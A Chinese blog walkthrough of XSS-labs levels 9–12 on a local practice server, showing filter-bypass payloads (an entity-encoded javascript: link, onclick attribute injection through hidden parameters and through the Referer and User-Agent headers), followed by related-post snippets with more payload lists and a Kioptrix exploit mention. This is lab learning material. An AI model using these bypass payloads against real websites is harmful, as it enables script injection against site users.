XSS-labs靶场过关秘籍(level 9-12)

已于 2022-09-21 16:38:27 修改
阅读量1.4k 收藏
点赞数 1
分类专栏: xss-labs 文章标签: xss 前端 javascript web安全
于 2022-09-21 16:37:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_45741871/article/details/126974608
版权
本文提供XSS靶场level9-12的详细过关策略,包括如何利用大小写过滤、实体编码绕过等技巧,及针对不同隐藏变量的XSS注入测试方法。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

XSS-labs靶场过关秘籍(level 9-12)

level 9

进入靶场,看见输入框,使用测试xss注入代码进行过滤测试

<script" ' Oonn>

在这里插入图片描述
点击添加友情链接后发现输入框中的大写字母变成小写,存在大小写过滤
在这里插入图片描述
点击友情链接发现页面跳转后提示404错误
在这里插入图片描述
查看页面源码发现提示输入的链接不合法
在这里插入图片描述
使用符合属性href的格式和百度的URL地址进行测试

javascript:alert('http://www.baidu.com')

在这里插入图片描述
点击添加友情链接,点击链接后发现页面跳转提示403错误
在这里插入图片描述
查看页面源码发现对javascript进行过滤,使用实体编码进行绕过

java&#x73;cript:alert('http://www.baidu.com')

在这里插入图片描述
添加友情链接后点击超链接,页面提示过关
在这里插入图片描述

level 10

进入靶场,发现页面没有输入框,分析URL地址发现存在使用GET请求方式传递的参数
在这里插入图片描述
将xss测试注入代码写入GET请求方式的参数中

http://127.0.0.1/xss/level10.php?keyword=<script " ' Oonn>

在这里插入图片描述
提交请求后发现页面没有提示,查看页面源码
在这里插入图片描述
分析页面源码发现没有接收参数keyword的变量,但是有三个被隐藏的变量,向这三个变量传递参数值,测试是否存在xss注入
测试变量t_link

click" type="button" οnclick="javascript:alert(1) //闭合符合

http://127.0.0.1/xss/level10.php?t_link=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_link变量没有接收参数值
在这里插入图片描述
测试变量t_history

click" type="button" οnclick="javascript:alert(1) //闭合符合

http://127.0.0.1/xss/level10.php?t_history=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_history变量没有接收参数值
在这里插入图片描述
测试变量t_sort

click" type="button" οnclick="javascript:alert(1) //闭合符合

http://127.0.0.1/xss/level10.php?t_sort=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
提交请求后页面出现按钮。点击页面提示过关
在这里插入图片描述

level 11

进入靶场,发现页面没有输入框,分析URL地址发现存在使用GET请求方式传递的参数
在这里插入图片描述
将xss测试注入代码写入GET请求方式的参数中

http://127.0.0.1/xss/level11.php?keyword=<script " ' Oonn>

提交请求后页面没有提示,查看页面源码
在这里插入图片描述
在这里插入图片描述
分析页面源码发现没有接收参数keyword的变量,但是有四个被隐藏的变量,向这四个变量传递参数值,测试是否存在xss注入
测试变量t_link

click" type="button" οnclick="javascript:alert(1) //闭合符合

http://127.0.0.1/xss/level11.php?t_link=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
在这里插入图片描述

页面没有按键出现,查看页面源码发现t_link变量没有接收参数值

测试变量t_history

click" type="button" οnclick="javascript:alert(1) //闭合符合

http://127.0.0.1/xss/level11.php?t_history=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_history变量没有接收参数值
在这里插入图片描述

测试变量t_sort

click" type="button" οnclick="javascript:alert(1) //闭合符合

http://127.0.0.1/xss/level11.php?t_sort=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述

页面没有按键出现,查看页面源码发现t_sort变量没有接收参数值
在这里插入图片描述
测试变量t_ref

click" type="button" οnclick="javascript:alert(1) //闭合符合

http://127.0.0.1/xss/level11.php?t_ref=click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面没有按键出现,查看页面源码发现t_ref没有接收参数值
在这里插入图片描述
根据变量名猜测接收的值可能写在数据包中,勾选referrer选项,抓取数据包
在这里插入图片描述
在数据包中修改Referrer的值,改为xss注入代码,放包

click" type="button" οnclick="javascript:alert(1)

在这里插入图片描述
页面出现按钮,点击,页面提示过关
在这里插入图片描述

level 12

进入靶场,发现页面没有输入框,分析URL地址发现存在使用GET请求方式传递的参数
在这里插入图片描述
将xss测试注入代码写入GET请求方式的参数中

http://127.0.0.1/xss/level12.php?keyword=<script " ' Oonn>

提交请求后页面没有提示,查看页面源码,分析源码发现没有接收参数keyword的值的变量,但是其中隐藏变量t_ua接收了数据包中User-Agent的值
在这里插入图片描述
抓取数据包,修改User-Agent的值,改为xss注入代码
在这里插入图片描述
放包,页面出现按钮,点击,页面提示过关
在这里插入图片描述

Vulhub靶场 --- Kioptrix Level 1
m0_52072483的博客
01-26 206
Vulhub靶场 — Kioptrix Level 1 nmap扫描端口信息 dirb扫描目录 访问结果的目录 使用nikto扫描 访问test.php 查找mod_ssl是否有可利用的漏洞 searchsploit -m 47080.c apt-get install libssl-dev gcc -o OpenFuck 47080.c -lcrypto ...
XSSxss-labs靶场通关
qq_62987084的博客
09-22 1069
xss-labs靶场通关详解
XSS-9注入靶场闯关(小游戏)——第九关
qq_39330735的博客
02-04 702
XSS-9注入靶场闯关(小游戏)——第九关,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload
0x01--Prime_Series_Level-1靶场
growler67
09-16 2164
001–靶场介绍 Prime是vulnhub靶场环境的一个简单的利用靶场,我们可以在vulnhub的官网里搜索到它,Prime系列共有六个靶场,本次使用的是19年出的第一个靶场环境。 介绍及下载链接:https://www.vulnhub.com/entry/prime-1,358 002–安装 靶场下载后是一个压缩文件,解压后用vm打开就行了,默认网络连接方式是nat,开机后自动获取VM虚拟网卡的dhcp地址。 查看本地的nat网段的操作如下: 003–攻击 本次环境模拟在未知具体ip地址的环境进行渗
xss-labs/level9
m0_71299382的博客
11-29 351
xss-labs/level9
Kioptrix Level 4靶场超详细讲解!&mysql udf提权具体如何操作&小白都能看懂!详细到家了!&Kioptrix Level 4靶场的安装
jockerboss的博客
02-28 1183
Kioptrix Level 4靶场超详细讲解!mysql udf提权具体如何操作 小白都能看懂!详细到家了!巨详细的过程以及参数详解!
XSS漏洞:xss-labs靶场通关
qq_68163788的博客
01-16 3366
xss-lab是一个旨在帮助安全研究人员、开发人员和安全爱好者学习和理解跨站脚本攻击(XSS)的项目。它通常包括一系列设计精良的实验室环境,用于模拟真实世界中可能遇到的XSS漏洞场景。这些实验室环境通常包括各种不同类型和难度级别的XSS漏洞,以帮助学习者逐步提高他们的技能。 通过xss-lab项目,用户可以学习如何利用XSS漏洞来攻击网站、窃取用户信息、执行恶意代码等。同时,用户也可以学习如何防御和修复这些漏洞,从而提高网站的安全性。 xss-lab项目的目的是通过实践操作的方式来加深对XSS攻击的理解
xss-labsxss-labs 靶场通关(1-9
m0_71944965的博客
08-31 1451
查看网站源码,可以发现get传参name的值test插入了html里头 直接在url后加上JS语句即可 第二关 lever2 查看网页源码发现和第一关差不多,先在url后加上JS语句试试 发现报错 再次查看源码,发现JS语句被包在中没有执行 应该闭合 第三关 level3 先输入123456,然后查看网站源码 所以还是闭合问题,输入第二题的JS语言试试 发现报错 用单引号闭合试试,还是报错,检查源代码 发现符号被过滤 我们可以利用onclick绕过号的过滤来达到执行js的目的在文本框输
xss-labs靶场level15攻略 页面中html引用法
godfish44的博客
09-17 320
经过不懈努力,我们成功通过了前面12关,需要注意的是,十三关的技巧与十一关和十二关大同小异,只是将注入的位置改为cookie即可,而第十四关页面中内嵌的网页已经无法访问了,我们直接跳过,接下来我们一起看第十五关。函数可以理解为文件包含的作用,它可以直接引用同一域名下的html页面,通俗点来说,就是在页面中导入另一个页面,它是基于AngularJS框架的。弄清楚了这一点,我们只需要把aaaaa替换为另一个网页的html文件,就可以显示出该网页并利用该网页的漏洞成功执行代码,弹出警告框。
xss-labs靶场实战通关教程】
AuroraMiraitowa的博客
03-09 1264
好吧,原来还有其他隐藏的传参方法,学到了,下次就一个个测,这里是get传参t_sort,并过滤掉了<>号,不能闭合插入标签,但是我们还能用onfocus事件,因为这里输入框被隐藏了,需要添加type=“text”,构造payload。不难发现,这里面进行了小写转化,将检测出来的on,script,href给删掉了,但是没有关系,我们可以利用双拼写来绕过,这里可以看到,Get传参的值,只插入了h2标签里头,额那下面的input标签啥东西,还隐藏掉了。
Vulhub靶场 --- Kioptrix: Level 1.1 (#2)
m0_52072483的博客
01-26 266
Vulhub靶场 — KIOPTRIX: LEVEL 1.1 nmap扫描端口信息 dirb 扫描目录信息 在登录页面使用PHP的万能密码尝试登录,且登录成功 登录成功的页面是一个可以ping的远程命令执行 获得shell 查看系统信息 查找是否存在可利用的漏洞 提权成功 ...
XSSxss-labs-level9
Hugu
02-23 764
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
新手打 XSS-level(1-13) 靶场心得和总结
m0_73992753的博客
07-13 1337
新手学习 XSS-level(1-13)练级
Xsslabs靶场笔记Level1-10
阿鱼的小世界
11-02 2681
前言 仅练习了前10关,并没有详细解释如何构造payload,如有需求可参考最后的文章。 靶场下载:蓝奏云-密码blhk 正文 payload常用函数 <script>alert(1)</script> <img src=0 onerror="javascript:alert(1)"> <a href=javascript:alert(1)></a> onclick="alert(1)"#鼠标单击触发弹框 onfocus="alert(
xss-labs靶场训练(5-9关)
ldzhhh的博客
05-21 640
第一关 先试一下经典的payload: 这里把script过滤了 onclick也被过滤了 onmouseover也同样被过滤了,尝试用标签执行javascript:伪协议。 Payload: ”><a href=javascript:alert()>xss</a>` 点击一下搜索按钮左侧的xss就成功弹窗了 后台关键代码: <?php ini_set("display_errors", 0); $str = strtolower($_GET["keywor
xss-labs靶场第九关测试报告
ccc_9wy的博客
10-13 439
xss-labs靶场第九关渗透测试;get型xss注入;反射型xss;绕过姿势;编码绕过;phpstudy;
xss-labs通关记录(level6~9
qq_39670065的博客
07-24 694
level-6 老样子,在输入框使用<script>alert('xss')</script>进行尝试 输入框显示为<scr_ipt>alert('xss')</script> 查看源码 会发现和Level-5很相似 尝试用"onfocus=javascript:alert('xss') " 在value参数值处"o_nfocus=javascript:alert('xss') " 再就是 ...
xss-labs靶场实战全通关详细过程(xss靶场详解)
热门推荐
金 帛的博客
07-13 5万+
xss靶场一到二十关通关详细教程
XSS-labs靶场实战(四)——第9-11关
永远是少年
11-18 734
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS-labs靶场实战第9-11关。 一、第九关 二、第十关 三、第十一关
xss-labs靶场通关详解11
最新发布
03-12
好的,我现在需要帮助用户解决XSS-Labs第11关的问题。首先,我得回顾用户提供的引用内容,尤其是引用[3],里面提到了第11关的情况。根据描述,这一关使用了htmlspecialchars()函数处理输入,导致无法通过常规的双...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值